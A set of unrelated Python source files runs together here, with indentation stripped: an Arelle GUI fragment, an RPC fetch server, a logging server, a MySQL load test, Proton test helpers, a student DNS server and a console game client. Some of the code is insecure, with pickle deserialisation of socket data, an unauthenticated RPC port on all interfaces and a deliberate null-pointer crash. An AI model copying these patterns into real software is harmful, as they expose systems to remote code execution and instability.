Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
MaxFile=4096,
InitialDir=initialdir,
Title=title,
DefExt=defaultextension)
return filename
except win32gui.error:
return ''
else:
return {"open":tkinter.filedialog.askopenfilename,
"save":tkinter.filedialog.asksaveasfilename}[action](
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
from arelle import DialogFormulaParameters
class WinMainLogHandler(logging.Handler):
def __init__(self, cntlr):
super(WinMainLogHandler, self).__init__()
self.cntlr = cntlr
#formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
self.setFormatter(formatter)
def flush(self):
''' Nothing to flush '''
def emit(self, logRecord):
# add to logView
msg = self.format(logRecord)
try:
self.cntlr.addToLog(msg, level=logRecord.levelno)
except:
pass
class TkinterCallWrapper:
"""Replacement for internal tkinter class. Stores function to call when some user
defined Tcl function is called e.g. after an event occurred."""
def __init__(self, func, subst, widget):
"""Store FUNC, SUBST and WIDGET as members."""
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
"""Apply first function SUBST to arguments, than FUNC."""
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except SystemExit as msg:
raise SystemExit(msg)
except Exception:
# this was tkinter's standard coding: self.widget._report_exception()
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
tkinter.messagebox.showerror(_("Exception"),
_("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
# this is the entry called by arelleGUI.pyw for windows
global restartMain
while restartMain:
restartMain = False
application = Tk()
cntlrWinMain = CntlrWinMain(application)
application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
if sys.platform == "darwin" and not __file__.endswith(".app/Contents/MacOS/arelle"):
# not built app - launches behind python or eclipse
application.lift()
application.call('wm', 'attributes', '.', '-topmost', True)
cntlrWinMain.uiThreadQueue.put((application.call, ['wm', 'attributes', '.', '-topmost', False]))
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
application.mainloop()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main()
|
server.py
|
import logging
import threading
import queue
import sys
import pickle
import sys
import queue
import os
import signal
from gevent.server import StreamServer
import FetchAgent.MessageProcessor
import traceback
import logSetup
import mprpc
import gevent.monkey
import gevent
# from graphitesend import graphitesend
import statsd
import settings
import time
# import rpyc
# rpyc.core.protocol.DEFAULT_CONFIG['allow_pickle'] = True
# from rpyc.utils.server import ThreadPoolServer
INTERRUPTS = 0
TO_EXIT = []
def build_mprpc_handler(server):
global TO_EXIT
TO_EXIT.append(server)
def handler(signum=-1, frame=None):
global INTERRUPTS
INTERRUPTS += 1
print('Signal handler called with signal %s for the %s time' % (signum, INTERRUPTS))
if INTERRUPTS > 2:
print("Raising due to repeat interrupts")
raise KeyboardInterrupt
for server in TO_EXIT:
server.close()
return handler
def base_abort():
print("Low level keyboard interrupt")
for server in TO_EXIT:
server.close()
class FetchInterfaceClass(mprpc.RPCServer):
def __init__(self, interface_dict, rpc_prefix):
mp_conf = {"use_bin_type":True}
super().__init__(
pack_params = {
"use_bin_type":True
},
# unpack_param = {
# 'raw' : True,
# 'max_buffer_size' : sys.maxint,
# 'max_str_len' : sys.maxint,
# 'max_bin_len' : sys.maxint,
# 'max_array_len' : sys.maxint,
# 'max_map_len' : sys.maxint,
# 'max_ext_len' : sys.maxint,
# },
)
self.log = logging.getLogger("Main.{}-Interface".format(rpc_prefix))
self.mdict = interface_dict
self.log.info("Connection")
def __check_have_queue(self, queuename):
if not queuename in self.mdict['outq']:
with self.mdict['qlock']:
self.mdict['outq'][queuename] = queue.Queue()
self.mdict['inq'][queuename] = queue.Queue()
def __check_rss_queue(self, queuename):
if not queuename in self.mdict['feed_outq']:
with self.mdict['qlock']:
self.mdict['feed_outq'][queuename] = queue.Queue()
self.mdict['feed_inq'][queuename] = queue.Queue()
def putJob(self, queuename, job):
self.__check_have_queue(queuename)
self.log.info("Putting item in queue %s with size: %s (Queue size: %s)!", queuename, len(job), self.mdict['outq'][queuename].qsize())
self.mdict['outq'][queuename].put(job)
def getJob(self, queuename):
self.__check_have_queue(queuename)
self.log.info("Get job call for '%s' -> %s", queuename, self.mdict['inq'][queuename].qsize())
try:
tmp = self.mdict['inq'][queuename].get_nowait()
return tmp
except queue.Empty:
return None
def getJobNoWait(self, queuename):
self.__check_have_queue(queuename)
self.log.info("Get job call for '%s' -> %s", queuename, self.mdict['inq'][queuename].qsize())
try:
return self.mdict['inq'][queuename].get_nowait()
except queue.Empty:
return None
def putRss(self, message):
feed_q_name = 'rss_queue'
self.__check_rss_queue(feed_q_name)
self.log.info("Putting rss item with size: %s (qsize: %s)!", len(message), self.mdict['feed_outq'][feed_q_name].qsize())
self.mdict['feed_outq'][feed_q_name].put(message)
def putManyRss(self, messages):
feed_q_name = 'rss_queue'
self.__check_rss_queue(feed_q_name)
for message in messages:
self.log.info("Putting rss item with size: %s!", len(message))
self.mdict['feed_outq'][feed_q_name].put(message)
def getRss(self):
feed_q_name = 'rss_queue'
self.__check_rss_queue(feed_q_name)
self.log.info("Get job call for rss queue -> %s", self.mdict['feed_inq'][feed_q_name].qsize())
try:
ret = self.mdict['feed_inq'][feed_q_name].get_nowait()
return ret
except queue.Empty:
return None
def checkOk(self):
return (True, b'wattt\0')
sock_path = '/tmp/rwp-fetchagent-sock'
def run_rpc(interface_dict):
print("MpRPC server Started.")
server_instance = FetchInterfaceClass(interface_dict, "MpRPC")
mprpc_server = StreamServer(('0.0.0.0', 4315), server_instance)
gevent.signal(signal.SIGINT, build_mprpc_handler(mprpc_server))
mprpc_server.serve_forever()
def initialize_manager(interface_dict):
# interface_dict.qlock = pickle.dumps(mgr.Lock())
interface_dict['qlock'] = threading.Lock()
print("Manager lock: ", interface_dict['qlock'])
interface_dict['outq'] = {}
interface_dict['inq'] = {}
interface_dict['feed_outq'] = {}
interface_dict['feed_inq'] = {}
def run():
interface_dict = {}
logSetup.initLogging()
# Make sure the socket does not already exist
try:
os.unlink(sock_path)
except OSError:
if os.path.exists(sock_path):
raise
initialize_manager(interface_dict)
amqp_interface = FetchAgent.MessageProcessor.MessageProcessor(interface_dict)
print("AMQP Interfaces have started. Launching RPC threads.")
t2 = threading.Thread(target=run_rpc, args=(interface_dict, ))
t2.start()
try:
while INTERRUPTS == 0:
amqp_interface.run()
time.sleep(0.1)
except AssertionError:
print("Main worker encountered assertion failure!")
traceback.print_exc()
base_abort()
except KeyboardInterrupt:
print("Main worker abort")
base_abort()
except Exception:
print("Wat?")
traceback.print_exc()
with open("Manager error %s.txt" % time.time(), "w") as fp:
fp.write("Manager crashed?\n")
fp.write(traceback.format_exc())
print("Joining on worker threads")
t2.join(timeout=60)
print("Terminating AMQP interface.")
amqp_interface.terminate()
def main():
print("Preloading cache directories")
# print("Testing reload")
# server.tree.tree.reloadTree()
# print("Starting RPC server")
try:
run()
except:
# abort /hard/ if we exceptioned out of the main run.
# This should (hopeully) cause the OS to terminate any
# remaining threads.
# As it is, I've been having issues with the main thread failing
# with 'OSError: [Errno 24] Too many open files', killing the main thread
# and leaving some of the amqp interface threads dangling.
# Somehow, it's not being caught in the `except Exception:` handler
# in run(). NFI how.
import ctypes
ctypes.string_at(0)
if __name__ == '__main__':
main()
|
server.py
|
"""Logging Server for multiprocessing logging managements.
Basic usage:
>>> import logging, sys
>>> ls = LoggingServer()
>>> sh = logging.StreamHandler(sys.stdout)
>>> ls.logger.addHandler(sh)
>>> ls.start() # run server in other thread.
>>> # your process
...
>>> # end process
>>> # Server thread is deamon, so you don't need call `ls.shutdown()`
>>> ls.shutdown() # If you need. `del ls` is same.
You can use any server address
>>> ls = LoggingServer(host="127.0.0.1", port=9999)
"""
from .handlers import LogRecordStreamHandler
import socketserver
import logging
import logging.handlers
import threading
from typing import *
class LoggingServer(socketserver.ThreadingTCPServer):
"""The SocketServer which receive Logs."""
allow_reuse_address = True
daemon_threads = True
def __init__(self,host='localhost',port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler, logger_name:str=__name__):
super().__init__((host, port), handler)
self.timeout = 1
self.logname = logger_name
self.logger = logging.getLogger(logger_name)
self.__shutdown = True
self.server_thread:threading.Thread = None
def serve_until_stopped(self):
import select
while not self.__shutdown:
rd, wr, ex = select.select([self.socket.fileno()], [], [], self.timeout)
if rd:
self.handle_request()
self.logger.info("Logging Server stopped.")
def start(self):
"""Starts serve_until_stopped roop as a daemon thread."""
self.__shutdown= False
self.server_thread = threading.Thread(target=self.serve_until_stopped,daemon=True)
self.server_thread.start()
self.logger.info("About starting Logging Server...")
def shutdown(self):
"""Stops serve_until_stopped roop."""
self.__shutdown = True
self.logger.info("Shutdown Logging Server...")
@property
def is_shutdown(self) -> bool:
return self.__shutdown
def __enter__(self):
"""Starts server."""
self.start()
def __exit__(self, exc_type,exc_val,exc_tb) -> None:
"""Shutdown server"""
self.shutdown()
|
pymysql_9_conn_test.py
|
#! /usr/bin/python
# -*- coding: UTF-8 -*-
from pymysql_comm import UsingMysql
import threading
from random import randint
# 模拟用户行为, 仅仅是查看数据库连接
def mock_user_action(name):
log_label = '%s 查看了数据库' % name
with UsingMysql(log_time=False) as um:
um.cursor.execute("update Product set name = '%s' from Product")
data = um.cursor.fetchone()
if not data:
print('-- ')
return
def check_access():
user_count = 100000 # 模拟用户数
# 模拟用户抢商品
for i in range(0, user_count):
user_name = '用户-%d' % i
thread = threading.Thread(target=mock_user_action, args=(user_name,))
thread.start()
if __name__ == '__main__':
check_access()
|
common.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from random import randint
from threading import Thread
from socket import socket, AF_INET, SOCK_STREAM
from subprocess import Popen,PIPE,STDOUT
import sys, os, string
from proton import Driver, Connection, Transport, SASL, Endpoint, Delivery, \
SSLDomain, SSLUnavailable
def free_tcp_ports(count=1):
""" return a list of 'count' TCP ports that are free to used (ie. unbound)
"""
retry = 0
ports = []
sockets = []
while len(ports) != count:
port = randint(49152, 65535)
sockets.append( socket( AF_INET, SOCK_STREAM ) )
try:
sockets[-1].bind( ("0.0.0.0", port ) )
ports.append( port )
retry = 0
except:
retry += 1
assert retry != 100, "No free sockets available for test!"
for s in sockets:
s.close()
return ports
def pump_uni(src, dst, buffer_size=1024):
p = src.pending()
c = dst.capacity()
if c < 0:
if p < 0:
return False
else:
src.close_head()
return True
if p < 0:
dst.close_tail()
elif p == 0 or c == 0:
return False
else:
bytes = src.peek(min(c, buffer_size))
dst.push(bytes)
src.pop(len(bytes))
return True
def pump(transport1, transport2, buffer_size=1024):
""" Transfer all pending bytes between two Proton engines
by repeatedly calling peek/pop and push.
Asserts that each engine accepts some bytes every time
(unless it's already closed).
"""
while (pump_uni(transport1, transport2, buffer_size) or
pump_uni(transport2, transport1, buffer_size)):
pass
def isSSLPresent():
""" True if a suitable SSL library is available.
"""
try:
xxx = SSLDomain(SSLDomain.MODE_SERVER)
return True
except SSLUnavailable, e:
# SSL libraries not installed
return False
class Test(object):
def __init__(self, name):
self.name = name
def configure(self, config):
self.config = config
def default(self, name, value, **profiles):
default = value
profile = self.config.defines.get("profile")
if profile:
default = profiles.get(profile, default)
return self.config.defines.get(name, default)
@property
def delay(self):
return float(self.default("delay", "1", fast="0.1"))
@property
def timeout(self):
return float(self.default("timeout", "60", fast="10"))
@property
def verbose(self):
return int(self.default("verbose", 0))
class Skipped(Exception):
skipped = True
class TestServer(object):
""" Base class for creating test-specific message servers.
"""
def __init__(self, **kwargs):
self.args = kwargs
self.driver = Driver()
self.host = "127.0.0.1"
self.port = 0
if "host" in kwargs:
self.host = kwargs["host"]
if "port" in kwargs:
self.port = kwargs["port"]
self.driver_timeout = -1
self.credit_batch = 10
self.thread = Thread(name="server-thread", target=self.run)
self.thread.daemon = True
self.running = True
def start(self):
retry = 0
if self.port == 0:
self.port = str(randint(49152, 65535))
retry = 10
self.listener = self.driver.listener(self.host, self.port)
while not self.listener and retry > 0:
retry -= 1
self.port = str(randint(49152, 65535))
self.listener = self.driver.listener(self.host, self.port)
assert self.listener, "No free port for server to listen on!"
self.thread.start()
def stop(self):
self.running = False
self.driver.wakeup()
self.thread.join()
if self.listener:
self.listener.close()
cxtr = self.driver.head_connector()
while cxtr:
if not cxtr.closed:
cxtr.close()
cxtr = cxtr.next()
# Note: all following methods all run under the thread:
def run(self):
while self.running:
self.driver.wait(self.driver_timeout)
self.process_listeners()
self.process_connectors()
def process_listeners(self):
""" Service each pending listener
"""
l = self.driver.pending_listener()
while l:
cxtr = l.accept()
assert(cxtr)
self.init_connector(cxtr)
l = self.driver.pending_listener()
def init_connector(self, cxtr):
""" Initialize a newly accepted connector
"""
sasl = cxtr.sasl()
sasl.mechanisms("ANONYMOUS")
sasl.server()
cxtr.connection = Connection()
if "idle_timeout" in self.args:
cxtr.transport.idle_timeout = self.args["idle_timeout"]
def process_connectors(self):
""" Service each pending connector
"""
cxtr = self.driver.pending_connector()
while cxtr:
self.process_connector(cxtr)
cxtr = self.driver.pending_connector()
def process_connector(self, cxtr):
""" Process a pending connector
"""
if not cxtr.closed:
cxtr.process()
sasl = cxtr.sasl()
if sasl.state != SASL.STATE_PASS:
self.authenticate_connector(cxtr)
else:
conn = cxtr.connection
if conn:
self.service_connection(conn)
cxtr.process()
def authenticate_connector(self, cxtr):
""" Deal with a connector that has not passed SASL
"""
# by default, just permit anyone
sasl = cxtr.sasl()
if sasl.state == SASL.STATE_STEP:
sasl.done(SASL.OK)
def service_connection(self, conn):
""" Process a Connection
"""
if conn.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT:
conn.open()
# open all pending sessions
ssn = conn.session_head(Endpoint.LOCAL_UNINIT)
while ssn:
self.init_session(ssn)
ssn.open()
ssn = ssn.next(Endpoint.LOCAL_UNINIT)
# configure and open any pending links
link = conn.link_head(Endpoint.LOCAL_UNINIT)
while link:
self.init_link(link)
link.open()
link = link.next(Endpoint.LOCAL_UNINIT);
## Step 2: Now drain all the pending deliveries from the connection's
## work queue and process them
delivery = conn.work_head
while delivery:
self.process_delivery(delivery)
delivery = conn.work_head
## Step 3: Clean up any links or sessions that have been closed by the
## remote. If the connection has been closed remotely, clean that up
## also.
# teardown any terminating links
link = conn.link_head(Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED)
while link:
link.close()
link = link.next(Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED)
# teardown any terminating sessions
ssn = conn.session_head(Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED)
while ssn:
ssn.close(ssn)
ssn = ssn.next(Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED)
if conn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED:
conn.close()
def init_session(self, ssn):
""" Test-specific Session initialization
"""
pass
def init_link(self, link):
""" Test-specific Link initialization
"""
pass
def process_delivery(self, delivery):
""" Test-specific Delivery processing.
"""
pass
class TestServerDrain(TestServer):
""" A primitive test server that accepts connections and simply discards any
messages sent to it.
"""
def __init__(self, **kwargs):
TestServer.__init__(self, **kwargs)
def init_link(self, link):
""" Test-specific Link initialization
"""
if link.is_receiver:
link.flow(self.credit_batch)
def process_delivery(self, delivery):
""" Just drop any incomming messages
"""
link = delivery.link
if delivery.readable: # inbound data available
m = link.recv(1024)
while m:
#print("Dropping msg...%s" % str(m))
m = link.recv(1024)
delivery.update(Delivery.ACCEPTED)
delivery.settle()
else:
link.advance()
if link.credit == 0:
link.flow(self.credit_batch)
#
# Classes that wrap the messenger applications msgr-send and msgr-recv.
# These applications reside in the tests/tools/apps directory
#
class MessengerApp(object):
""" Interface to control a MessengerApp """
def __init__(self):
self._cmdline = None
# options common to Receivers and Senders:
self.ca_db = None
self.certificate = None
self.privatekey = None
self.password = None
self._output = None
def findfile(self, filename, searchpath):
"""Find filename in the searchpath
return absolute path to the file or None
"""
paths = string.split(searchpath, os.pathsep)
for path in paths:
if os.path.exists(os.path.join(path, filename)):
return os.path.abspath(os.path.join(path, filename))
return None
def start(self, verbose=False):
""" Begin executing the test """
cmd = self.cmdline()
self._verbose = verbose
if self._verbose:
print("COMMAND='%s'" % str(cmd))
#print("ENV='%s'" % str(os.environ.copy()))
try:
if os.name=="nt":
# Windows handles python launch by replacing script 'filename' with
# 'python abspath-to-filename' in cmdline arg list.
if cmd[0].endswith('.py'):
foundfile = self.findfile(cmd[0], os.environ['PATH'])
if foundfile is None:
foundfile = self.findfile(cmd[0], os.environ['PYTHONPATH'])
assert foundfile is not None, "Unable to locate file '%s' in PATH or PYTHONPATH" % cmd[0]
del cmd[0:1]
cmd.insert(0, foundfile)
cmd.insert(0, sys.executable)
self._process = Popen(cmd, stdout=PIPE, stderr=STDOUT, bufsize=4096)
except OSError, e:
print("ERROR: '%s'" % e)
assert False, "Unable to execute command '%s', is it in your PATH?" % cmd[0]
self._ready() # wait for it to initialize
def stop(self):
""" Signal the client to start clean shutdown """
pass
def wait(self):
""" Wait for client to complete """
self._output = self._process.communicate()
if self._verbose:
print("OUTPUT='%s'" % self.stdout())
def status(self):
""" Return status from client process """
return self._process.returncode
def stdout(self):
#self._process.communicate()[0]
if not self._output or not self._output[0]:
return "*** NO STDOUT ***"
return self._output[0]
def stderr(self):
if not self._output or not self._output[1]:
return "*** NO STDERR ***"
return self._output[1]
def cmdline(self):
if not self._cmdline:
self._build_command()
return self._cmdline
def _build_command(self):
assert False, "_build_command() needs override"
def _ready(self):
assert False, "_ready() needs override"
def _do_common_options(self):
""" Common option handling """
if self.ca_db is not None:
self._cmdline.append("-T")
self._cmdline.append(str(self.ca_db))
if self.certificate is not None:
self._cmdline.append("-C")
self._cmdline.append(str(self.certificate))
if self.privatekey is not None:
self._cmdline.append("-K")
self._cmdline.append(str(self.privatekey))
if self.password is not None:
self._cmdline.append("-P")
self._cmdline.append("pass:" + str(self.password))
class MessengerSender(MessengerApp):
""" Interface to configure a sending MessengerApp """
def __init__(self):
MessengerApp.__init__(self)
self._command = None
# @todo make these properties
self.targets = []
self.send_count = None
self.msg_size = None
self.send_batch = None
self.outgoing_window = None
self.report_interval = None
self.get_reply = False
self.timeout = None
self.incoming_window = None
self.recv_count = None
self.name = None
# command string?
def _build_command(self):
self._cmdline = self._command
self._do_common_options()
assert self.targets, "Missing targets, required for sender!"
self._cmdline.append("-a")
self._cmdline.append(",".join(self.targets))
if self.send_count is not None:
self._cmdline.append("-c")
self._cmdline.append(str(self.send_count))
if self.msg_size is not None:
self._cmdline.append("-b")
self._cmdline.append(str(self.msg_size))
if self.send_batch is not None:
self._cmdline.append("-p")
self._cmdline.append(str(self.send_batch))
if self.outgoing_window is not None:
self._cmdline.append("-w")
self._cmdline.append(str(self.outgoing_window))
if self.report_interval is not None:
self._cmdline.append("-e")
self._cmdline.append(str(self.report_interval))
if self.get_reply:
self._cmdline.append("-R")
if self.timeout is not None:
self._cmdline.append("-t")
self._cmdline.append(str(self.timeout))
if self.incoming_window is not None:
self._cmdline.append("-W")
self._cmdline.append(str(self.incoming_window))
if self.recv_count is not None:
self._cmdline.append("-B")
self._cmdline.append(str(self.recv_count))
if self.name is not None:
self._cmdline.append("-N")
self._cmdline.append(str(self.name))
def _ready(self):
pass
class MessengerReceiver(MessengerApp):
""" Interface to configure a receiving MessengerApp """
def __init__(self):
MessengerApp.__init__(self)
self._command = None
# @todo make these properties
self.subscriptions = []
self.receive_count = None
self.recv_count = None
self.incoming_window = None
self.timeout = None
self.report_interval = None
self.send_reply = False
self.outgoing_window = None
self.forwards = []
self.name = None
# command string?
def _build_command(self):
self._cmdline = self._command
self._do_common_options()
self._cmdline += ["-X", "READY"]
assert self.subscriptions, "Missing subscriptions, required for receiver!"
self._cmdline.append("-a")
self._cmdline.append(",".join(self.subscriptions))
if self.receive_count is not None:
self._cmdline.append("-c")
self._cmdline.append(str(self.receive_count))
if self.recv_count is not None:
self._cmdline.append("-b")
self._cmdline.append(str(self.recv_count))
if self.incoming_window is not None:
self._cmdline.append("-w")
self._cmdline.append(str(self.incoming_window))
if self.timeout is not None:
self._cmdline.append("-t")
self._cmdline.append(str(self.timeout))
if self.report_interval is not None:
self._cmdline.append("-e")
self._cmdline.append(str(self.report_interval))
if self.send_reply:
self._cmdline.append("-R")
if self.outgoing_window is not None:
self._cmdline.append("-W")
self._cmdline.append(str(self.outgoing_window))
if self.forwards:
self._cmdline.append("-F")
self._cmdline.append(",".join(self.forwards))
if self.name is not None:
self._cmdline.append("-N")
self._cmdline.append(str(self.name))
def _ready(self):
""" wait for subscriptions to complete setup. """
r = self._process.stdout.readline()
assert r == "READY" + os.linesep, "Unexpected input while waiting for receiver to initialize: %s" % r
class MessengerSenderC(MessengerSender):
def __init__(self):
MessengerSender.__init__(self)
self._command = ["msgr-send"]
class MessengerSenderValgrind(MessengerSenderC):
""" Run the C sender under Valgrind
"""
def __init__(self, suppressions=None):
if "VALGRIND" not in os.environ:
raise Skipped("Skipping test - $VALGRIND not set.")
MessengerSenderC.__init__(self)
if not suppressions:
suppressions = os.path.join(os.path.dirname(__file__),
"valgrind.supp" )
self._command = [os.environ["VALGRIND"], "--error-exitcode=1", "--quiet",
"--trace-children=yes", "--leak-check=full",
"--suppressions=%s" % suppressions] + self._command
class MessengerReceiverC(MessengerReceiver):
def __init__(self):
MessengerReceiver.__init__(self)
self._command = ["msgr-recv"]
class MessengerReceiverValgrind(MessengerReceiverC):
""" Run the C receiver under Valgrind
"""
def __init__(self, suppressions=None):
if "VALGRIND" not in os.environ:
raise Skipped("Skipping test - $VALGRIND not set.")
MessengerReceiverC.__init__(self)
if not suppressions:
suppressions = os.path.join(os.path.dirname(__file__),
"valgrind.supp" )
self._command = [os.environ["VALGRIND"], "--error-exitcode=1", "--quiet",
"--trace-children=yes", "--leak-check=full",
"--suppressions=%s" % suppressions] + self._command
class MessengerSenderPython(MessengerSender):
def __init__(self):
MessengerSender.__init__(self)
self._command = ["msgr-send.py"]
class MessengerReceiverPython(MessengerReceiver):
def __init__(self):
MessengerReceiver.__init__(self)
self._command = ["msgr-recv.py"]
|
ts.py
|
# Anthony Tiongson (ast119) with assistance from Nicolas Gundersen (neg62)
# TS (a simplified top-level DNS server)
# resources:
# https://www.pythonforbeginners.com/system/python-sys-argv
import sys, threading, time, random, socket
def server():
# Establish port via command-line argument
port = int(sys.argv[1])
# Create file object to read TS DNS table
TSFile = open("PROJI-DNSTS.txt", "r")
# Initialize dictionary for DNS table
DNSTable = {}
# Store TS DNS table in dictionary
for line in TSFile:
hostname, IPaddress, flag = line.split()
hostname = hostname.lower()
DNSTable[hostname] = hostname + " " + IPaddress + " " + flag
print("Creating DNS dictionary: " + str(DNSTable) + "\n")
try:
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("TS server socket created: port " + str(port) + "\n")
except socket.error as socketError:
print('TS socket already open, error: {}\n'.format(socketError))
exit()
serverBinding = ('', port)
serverSocket.bind(serverBinding)
serverSocket.listen(1)
TSHostname = socket.gethostname()
print("TS server hostname: {}".format(TSHostname))
localhostIP = (socket.gethostbyname(TSHostname))
print("TS server IP address: {}".format(localhostIP))
while True:
clientSocketID, address = serverSocket.accept()
print("Received client connection request from: {}".format(address))
# Server greeting message to client
greeting = "Welcome to CS 352 TS server! Socket to me!"
clientSocketID.send(greeting.encode('utf-8'))
# Receive hostname query from the client
queryFromClient = clientSocketID.recv(256)
# The client is done querying
if queryFromClient == "shutdownTSServer":
print("Received shutdown command...")
clientSocketID.close()
break
# If hostname is in dictionary, send hostname information
elif queryFromClient in DNSTable:
clientSocketID.send(str(DNSTable[queryFromClient]).encode('utf-8'))
# Hostname not in dictionary, send error message
else:
clientSocketID.send(queryFromClient + " - Error:HOST NOT FOUND".encode('utf-8'))
# Close the client socket connection
print("\nClosing socket connection.\n")
clientSocketID.close()
# Close the server socket and shutdown server
serverSocket.close()
exit()
if __name__ == "__main__":
thread = threading.Thread(name='server', target = server)
thread.start()
sleepTime = random.random() * 5
print("\nTS server thread executed, sleep time: " + str(sleepTime) + " sec\n")
time.sleep(sleepTime)
|
mmorpgClient.py
|
import socket, pickle,time,os,threading,msvcrt,sys,random
import Action, basicBullet, Map, chatListUsers
createBullet = basicBullet.BasicBullet
createAction = Action.Action
#servidor
IP_server='localhost'
porta_server=12397
ACTION_DICTIONARY = {"a":"walk","w":"walk","s":"walk","d":"walk"," ":"shot","l":"reborn","r":"reload","i":"chat"}
socket_cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# a = (20,20)
# map = numpy.chararray(a)
isRunning=True
isDrawing=True
mapSize=1002
jLimit=58
j=jLimit
class User(object):
def __init__(self,position,style,alive,login):
self.p=position
self.lastPosition=[position-1]
self.style=style
self.login=login
self.alive=alive
self.kills=0
self.deaths=0
def filterKeys(key):
if(key=="a"):
return True
elif(key=="d"):
return True
elif(key=="s"):
return True
elif(key=="w"):
return True
elif(key==" "):
return True
elif(key=="p"):
return True
elif(key=="r"):
return True
elif(key=="l"):
return True
elif(key=="i"):
return True
else:
return False
map = Map.createMap()
# map = createMap()
def cleanMap(position,map):
map[position]=" "
return map
def killerAnimation(killer,dead):
i = random.randrange(4)
painel = []
theString1 = killer +" just Killed "+dead+" with a kind of, i don't know, a gun."
painel.append(theString1)
theString2 = killer +" matou o "+dead+" de forma implacável. e está imparável!"
painel.append(theString2)
painel.append(killer+" matou o "+dead+". A galera enlouqueceu!")
painel.append(killer+" killed "+dead+". But don't fell like you're the coolest kid in the place or what ever!")
return painel[i]
def painelCreate():
i = random.randrange(3)
painel=[]
painel.append(" Ubisoft Apresenta o game que a garotada toda estava esperando, direto do parque da xuxa")
painel.append(" Ofecimento Skol, a única que desce redondo. Volkswagen, você conhece, você confia!. Coca-Cola, Sinta o Sabor!")
painel.append(" Creditos Marcio Perdigão e Yagolicia")
return painel[i]
currentStringPainel=""
def animationThread():
while isRunning:
time.sleep(2)
global currentStringPainel
currentStringPainel = painelCreate()
while isRunning:
time.sleep(0.2)
# print(len(currentStringPainel))
# print(currentStringPainel)
if(len(currentStringPainel)==1): break
currentStringPainel = currentStringPainel[1:]
animationT = threading.Thread(target=animationThread)
animationT.start()
listUsers = []
listBullets = []
chatList = []
linha = int(mapSize/jLimit)
def startDrawing():
print ("Digite (W) para subir, (D) para ir à direita\n"
+"(S) para descer, (A) para ir à esquerda\n"
+"(Space) para atirar e(I) para abrir o chat")
fps=100/1000
while True:
while isDrawing:
map = Map.createMap()
print(currentStringPainel)
for bullet in listBullets:
# print(bullet)
map[bullet.position]="*"
# print(len(listUsers))
for user in listUsers:
if(user.alive):
print(" login: "+user.login+": kills: "+str(user.kills)+" deaths: "+str(user.deaths)+" foto: "+user.style)
map[user.p]=user.style
else:
if(l==user.login):
print("Press (L) to reborn, or just watch the game like a loooooosseeerrr!")
# map = cleanMap(personagem.p,map)
j=0
for i in range(mapSize+1):
if(j==jLimit):
j=0
theEnd='\n'
theFlush=False
else:
j=j+1
theEnd=" "
theFlush=True
# print(position)
# map[personagem.p]=personagem.style
print(map[i],end=theEnd,flush=theFlush)
print("FPS: "+str(fps))
for c in chatList:
print(" "+c.login+"\> "+c.msg)
time.sleep(fps)
os.system('cls')
time.sleep(1)
def sendMessage():
global isRunning
global isDrawing
global l
global p
while True:
a = msvcrt.getch()
# print(a)
if(str(a)==str(b'\xe0')):
# print("VALOR INVALIDO")
continue
if(filterKeys(a.decode("utf-8"))!=True):
# print("VALOR INVALIDO")
continue
if(a.decode("utf-8")=="p"):
print(a)
isRunning=False
isDrawing=False
sys.exit()
m = a.decode("utf-8")
if(a.decode("utf-8")=="i"):
isDrawing=False
time.sleep(0.5)
m = input("Digite a mensagem: ")
isDrawing=True
mSend = (ACTION_DICTIONARY[a.decode("utf-8")],((l,m),l,p,""))
byte = pickle.dumps(mSend)
socket_cliente.send(byte)
time.sleep(0.1)
def receive():
global isRunning
global isDrawing
global l
global p
global listActions
while True:
rec = socket_cliente.recv(1024)
if(isRunning):
# print(rec)
action,msg = pickle.loads(rec)
# print(action,msg)
for act in listActions:
# print(act.actionName,action)
if(act.actionName==action):
act.funAction(msg)
else:
mSend = ("disconnect",((l,p),l,p,""))
byte = pickle.dumps(mSend)
socket_cliente.send(byte)
socket_cliente.close()
sys.exit()
def chat(msg):
l,m = msg
global chatList
# print("chat")
for user in listUsers:
if(user.login==l):
if(len(chatList)>7):
chatList.pop(0)
c = chatListUsers.chat(l,m)
chatList.append(c)
def reborn(login):
global listUsers
# print("User is Reborn")
for index in range(len(listUsers)):
try:
if(index>len(listUsers)): break
if(listUsers[index].login==login):
listUsers[index].alive=True
# listUsers.pop(index)
except Exception as error:
print("")
def userDead(users):
global listUsers
global currentStringPainel
# print("User is Dead")
killer,kKills,kDeaths,dead,dKills,dDeaths = users
currentStringPainel = killerAnimation(killer,dead)
